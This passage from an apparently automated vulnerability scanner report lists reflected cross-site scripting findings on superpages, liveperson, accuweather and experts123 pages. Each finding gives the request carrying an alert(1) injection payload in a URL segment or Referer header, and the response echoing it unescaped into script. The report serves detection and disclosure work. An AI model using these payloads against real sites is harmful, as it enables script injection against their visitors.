Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/addList.jse3517&quot;-alert(1)-&quot;9ab61aa91ab
Server: Unspecified
Set-Cookie: JSESSIONID=672734BFB58DFD80247BC648ECB604A3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /ypbbf87&quot;-alert(1)-&quot;52571632a65/js/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=3503703CC4CACD6B2BC941DCABAA2129; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/ypbbf87"-alert(1)-"52571632a65/js/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js4eeb8&quot;-alert(1)-&quot;e241847a207/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=15C47AD265D59EE717AEA5A2D2950B64; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:39 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js4eeb8"-alert(1)-"e241847a207/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/showHide.jsed951&quot;-alert(1)-&quot;e596cd16daa
Server: Unspecified
Set-Cookie: JSESSIONID=5BD8F1FDB942096A70CE97B3C572330D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/showHide.jsed951"-alert(1)-"e596cd16daa?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

1.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /index-radar.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index-radar.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64616
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

1.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /maps-satellite.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps-satellite.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64040
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:14 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...

1.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35111


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=d80de';alert(1)//2bbe976dfa9');
});


</script>
...[SNIP]...

1.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "e2434";alert(1)//40b9502e47";
var RSQ = true;

$(function() {
experts123.Question.initialize(828301, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:17 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=58da2';alert(1)//bbd7524fdca');
});


</script>
...[SNIP]...

1.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "bcd6c";alert(1)//f1f27091f7b";
var RSQ = true;

$(function() {
experts123.Question.initialize(630175, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "25f3f";alert(1)//41fc69da3be";
var RSQ = true;

$(function() {
experts123.Question.initialize(821025, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

